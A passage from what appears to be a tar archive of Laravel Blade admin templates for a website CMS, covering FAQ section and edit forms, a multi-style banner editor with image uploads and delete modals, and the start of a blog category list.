$item_section->title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</span> </small> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-sm btn-primary" data-toggle="modal" data-target="#faqSectionDestroyModal{{ $item_section->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </form> <!-- Modal --> <div class="modal fade" id="faqSectionDestroyModal{{ $item_section->id }}" tabindex="-1" role="dialog" aria-labelledby="faqSectionDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="faqSectionDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('faq-section.destroy', $item_section->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('faq-section.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <input type="hidden" name="style" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_title">{{ __('content.section_title') }} </label> <input type="text" name="section_title" class="form-control" id="section_title"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'section_title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'section_title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'section_title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'section_title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'section_title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'section_title')">{{ __('<p>') }}</span> </small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }} </label> <input type="text" name="title" class="form-control" id="title"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</span> </small> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> @endif </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> <div class="modal fade" id="faqModal" tabindex="-1" role="dialog" aria-labelledby="faqModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="faqModalLabel">{{ __('content.add_new') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> <form action="{{ route('faq.store') }}" method="POST"> @csrf <input type="hidden" name="style" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="question">{{ __('content.question') }}</label> <input type="text" name="question" class="form-control" id="question"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="answer">{{ __('content.answer') }}</label> <textarea name="answer" class="form-control" id="answer" rows="3"></textarea> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'answer')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'answer')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'answer')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'answer')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'answer')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'answer')">{{ __('<p>') }}</span> </small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="0" required> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> @endsection ������������������������������������������������������������������������������������������������������������������������������������������views/admin/sections/faq/edit.blade.php�������������������������������������������������������������0000644�����������������00000007730�14765366573�0014130 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h4 class="card-title">{{ __('content.edit_faq') }} <!-- Button --> <a id="hoverButton" class="iyzi-btn"><i class="fas fa-camera"></i> {{ __('content.view_draft') }}</a> <!-- Modal --> <div id="imageModal" class="border border-success iyzi-modal"> <img class="img-fluid " src="{{ asset('uploads/img/dummy/style/faq-'.$item->style.'.jpg') }}" alt="draft image"> </div> </h4> <div> <a href="{{ url()->previous() }}" class="btn btn-primary"><i class="fas fa-angle-left"></i> {{ __('content.back') }}</a> </div> </div> <form action="{{ route('faq.update', $item->id) }}" method="POST"> @method('PUT') @csrf <input type="hidden" name="style" value="{{ $item->style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="question">{{ __('content.question') }} </label> <input type="text" name="question" class="form-control" id="question" value="{{ $item->question }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="answer">{{ __('content.answer') }}</label> <textarea type="text" name="answer" class="form-control" id="answer" rows="3">{{ $item->answer }}</textarea> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'answer')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'answer')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'answer')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'answer')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'answer')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'answer')">{{ __('<p>') }}</span> </small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="{{ $item->order }}" required> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> </div> </div> </div> <!-- end row --> @endsection ����������������������������������������views/admin/sections/banner/create.blade.php��������������������������������������������������������0000644�����������������00000106544�14765366573�0015147 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.banner') }} <div class="btn-group"> <button type="button" class="btn btn-primary btn-sm dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> {{ __('content.'.$style) }} </button> <div class="dropdown-menu"> <a class="dropdown-item" href="{{ route('banner.create', ['style' => 'style1']) }}">{{ __('content.style1') }}</a> <a class="dropdown-item" href="{{ route('banner.create', ['style' => 'style2']) }}">{{ __('content.style2') }}</a> <a class="dropdown-item" href="{{ route('banner.create', ['style' => 'style3']) }}">{{ __('content.style3') }}</a> <a class="dropdown-item" href="{{ route('banner.create', ['style' => 'style4']) }}">{{ __('content.style4') }}</a> </div> </div> <!-- Button --> <a id="hoverButton" class="iyzi-btn"><i class="fas fa-camera"></i> {{ __('content.view_draft') }}</a> <!-- Modal --> <div id="imageModal" class="border border-success iyzi-modal"> <img class="img-fluid " src="{{ asset('uploads/img/dummy/style/banner-'.$style.'.jpg') }}" alt="draft image"> </div> </h4> @if (isset($item_section)) @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('banner.update', $item_section->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <input name="style" type="hidden" value="{{ $style }}"> <div class="row"> @if ($style == 'style1' || $style == 'style2' || $style == 'style3') <div class="col-md-12"> <div class="form-group"> <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} @if ($style == 'style1' || $style == 'style2') 354 x 354) (.svg, .jpg, .jpeg, .png, .webp, .gif) @elseif ($style == 'style3' || $style == 'style4') 1920 x 1080) (.svg, .jpg, .jpeg, .png, .webp, .gif) @endif </label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> <div class="media"> @if (!empty($item_section->section_image)) <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/banner/'.$item_section->section_image) }}" alt="image" class="rounded"> </a> @else <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image" class="rounded w-25"> </a> @endif </div> @if (!empty($item_section->section_image)) <a class="mt-3 d-block" href="#" data-toggle="modal" data-target="#deleteModal{{ $item_section->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> @endif </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> @endif @if ($style == 'style3') <div class="col-md-12"> <div class="form-group"> <label for="section_image_2">{{ __('content.image') }} ({{ __('content.size') }} 1920 x 1080) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="section_image_2" class="form-control-file" id="section_image_2"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> <div class="media"> @if (!empty($item_section->section_image_2)) <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/banner/'.$item_section->section_image_2) }}" alt="image" class="rounded"> </a> @else <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image" class="rounded w-25"> </a> @endif </div> @if (!empty($item_section->section_image_2)) <a class="mt-3 d-block" href="#" data-toggle="modal" data-target="#deleteModal2{{ $item_section->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> @endif </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> <div class="col-md-12"> <div class="form-group"> <label for="section_image_3">{{ __('content.image') }} ({{ __('content.size') }} 1920 x 1080) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="section_image_3" class="form-control-file" id="section_image_3"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> <div class="media"> @if (!empty($item_section->section_image_3)) <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/banner/'.$item_section->section_image_3) }}" alt="image" class="rounded"> </a> @else <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image" class="rounded w-25"> </a> @endif </div> @if (!empty($item_section->section_image_3)) <a class="mt-3 d-block" href="#" data-toggle="modal" data-target="#deleteModal3{{ $item_section->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> @endif </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> @endif <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title" value="{{ $item_section->title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</span> </small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="description">{{ __('content.description') }}</label> <textarea name="description" class="form-control" id="description" rows="3">{{ $item_section->description }}</textarea> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'description')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'description')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'description')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'description')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'description')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'description')">{{ __('<p>') }}</span> </small> </div> </div> @if ($style == 'style4') <div class="col-md-12"> <div class="form-group"> <label for="youtube_video_url">{{ __('content.youtube_video_url') }}</label> <input type="text" name="youtube_video_url" class="form-control" id="youtube_video_url" value="{{ $item_section->youtube_video_url }}"> </div> </div> @else <input type="hidden" name="youtube_video_url"> @endif <div class="col-md-12"> <div class="form-group"> <label for="button_name">{{ __('content.button_name') }}</label> <input type="text" name="button_name" class="form-control" id="button_name" value="{{ $item_section->button_name }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_url">{{ __('content.button_url') }}</label> <input type="text" name="button_url" class="form-control" id="button_url" value="{{ $item_section->button_url }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_name_2">{{ __('content.button_name_2') }}</label> <input type="text" name="button_name_2" class="form-control" id="button_name_2" value="{{ $item_section->button_name_2 }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_url_2">{{ __('content.button_url_2') }}</label> <input type="text" name="button_url_2" class="form-control" id="button_url_2" value="{{ $item_section->button_url_2 }}"> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-primary" data-toggle="modal" data-target="#bannerDestroyModal{{ $item_section->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </div> </div> </form> <!-- Modal --> <div class="modal fade" id="deleteModal{{ $item_section->id }}" tabindex="-1" role="dialog" aria-labelledby="messageModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="messageModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('banner.destroy_image', $item_section->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger mr-1" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @if ($style == 'style3') <!-- Modal --> <div class="modal fade" id="deleteModal2{{ $item_section->id }}" tabindex="-1" role="dialog" aria-labelledby="messageModal2CenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="messageModal2CenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('banner.destroy_image_2', $item_section->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger mr-1" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> <!-- Modal --> <div class="modal fade" id="deleteModal3{{ $item_section->id }}" tabindex="-1" role="dialog" aria-labelledby="messageModal3CenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="messageModal2CenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('banner.destroy_image_3', $item_section->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger mr-1" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @endif <!-- Modal --> <div class="modal fade" id="bannerDestroyModal{{ $item_section->id }}" tabindex="-1" role="dialog" aria-labelledby="bannerDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="bannerDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('banner.destroy', $item_section->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger mr-1" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('banner.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <input name="style" type="hidden" value="{{ $style }}"> <div class="row"> @if ($style == 'style1' || $style == 'style2' || $style == 'style3') <div class="col-md-12"> <div class="form-group"> <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} @if ($style == 'style1' || $style == 'style2') 354 x 354) (.svg, .jpg, .jpeg, .png, .webp, .gif) @elseif ($style == 'style3' || $style == 'style4') 1920 x 1080) (.svg, .jpg, .jpeg, .png, .webp, .gif) @endif </label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> </div> @endif @if ($style == 'style3') <div class="col-md-12"> <div class="form-group"> <label for="section_image_2">{{ __('content.image') }} ({{ __('content.size') }} 1920 x 1080) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="section_image_2" class="form-control-file" id="section_image_2"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="section_image_3">{{ __('content.image') }} ({{ __('content.size') }} 1920 x 1080) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="section_image_3" class="form-control-file" id="section_image_3"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> </div> @endif <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</span> </small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="description">{{ __('content.description') }}</label> <textarea name="description" class="form-control" id="description" rows="3"></textarea> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'description')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'description')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'description')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'description')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'description')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'description')">{{ __('<p>') }}</span> </small> </div> </div> @if ($style == 'style4') <div class="col-md-12"> <div class="form-group"> <label for="youtube_video_url">{{ __('content.youtube_video_url') }}</label> <input type="text" name="youtube_video_url" class="form-control" id="youtube_video_url"> </div> </div> @else <input type="hidden" name="youtube_video_url"> @endif <div class="col-md-12"> <div class="form-group"> <label for="button_name">{{ __('content.button_name') }}</label> <input type="text" name="button_name" class="form-control" id="button_name"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_url">{{ __('content.button_url') }}</label> <input type="text" name="button_url" class="form-control" id="button_url"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_name_2">{{ __('content.button_name_2') }}</label> <input type="text" name="button_name_2" class="form-control" id="button_name_2"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_url_2">{{ __('content.button_url_2') }}</label> <input type="text" name="button_url_2" class="form-control" id="button_url_2"> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> @endif </div> </div> </div> <!-- end row --> @endsection ������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/blog/category/create.blade.php����������������������������������������������������������0000644�����������������00000027334�14765366573�0014612 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Include Alert Blade --> @include('admin.alert.alert') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-flex justify-content-between align-items-center mb-20"> <h6 class="card-title mb-0">{{ __('content.categories') }}</h6> <div> <button type="button" class="btn btn-primary float-right mb-3" data-toggle="modal" data-target="#categoryModal">+ {{ __('content.add_category') }}</button> </div> </div> @if (count($categories) > 0) <div> <input id="check_all" type="checkbox" onclick="showHideDeleteButton(this)"> <label for="check_all">{{ __('content.all') }}</label> <a id="deleteChecked" class="ml-2" href="#" data-toggle="modal" data-target="#deleteCheckedModal"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form onsubmit="return btnCheckListGet()" action="{{ route('blog-category.destroy_checked') }}" method="POST"> @method('DELETE') @csrf @endif <input type="hidden" id="checked_lists" name="checked_lists" value=""> <!-- Modal --> <div class="modal fade" id="deleteCheckedModal" tabindex="-1" role="dialog" aria-labelledby="deleteCheckedModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteCheckedModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.delete_selected') }} </div> <div class="modal-footer"> <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button onclick="btnCheckListGet()" type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </div> </div> </div> </div> </form> <table id="basic-datatable" class="table table-striped dt-responsive nowrap w-100"> <thead> <tr> <th scope="col">#</th> <th>{{ __('content.category_name') }}</th> <th>{{ __('content.order') }}</th> <th>{{ __('content.status') }}</th> <th class="custom-width-action">{{ __('content.action') }}</th> </tr> </thead> <tbody> @php $desc = count($categories); $asc=0; @endphp @foreach ($categories as $category) <tr> <td> <input name="check_list[]" type="checkbox" value="{{ $category->id }}" onclick="showHideDeleteButton2(this)"> <span class="d-none">{{ $asc++ }}{{ $desc-- }}</span> </td> <td>{{ $category->category_name }}</td> <td>{{ $category->order }}</td> <td> @if($category->status == 0) <span class="badge badge-danger">{{ __('content.disable') }}</span> @else <span class="badge badge-success">{{ __('content.enable') }}</span> @endif </td> <td> <div> <a href="{{ route('blog-category.edit', $category->id) }}" class="mr-2"> <i class="fa fa-edit text-info font-18"></i> </a> <a href="#" data-toggle="modal" data-target="#deleteModel{{ $category->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> </td> </tr> <!-- Modal --> <div class="modal fade" id="deleteModel{{ $category->id }}" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="exampleModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form class="d-inline-block" action="{{ route('blog-category.destroy', $category->id) }}" method="POST"> @method('DELETE') @csrf @endif <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @endforeach </tbody> </table> @else <span>{{ __('content.not_yet_created') }}</span> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> <div class="modal fade" id="categoryModal" tabindex="-1" role="dialog" aria-labelledby="categoryModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="categoryModalLabel">{{ __('content.add_new') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('blog-category.store') }}" method="POST"> @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="category_name">{{ __('content.category_name') }} <span class="text-red">*</span></label> <input type="text" name="category_name" class="form-control" id="category_name" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="0"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="status" class="col-form-label">{{ __('content.status') }}</label> <select name="status" class="form-control" id="status"> <option value="1" selected>{{ __('content.select_your_option') }}</option> <option value="1">{{ __('content.enable') }}</option> <option value="0">{{ __('content.disable') }}</option> 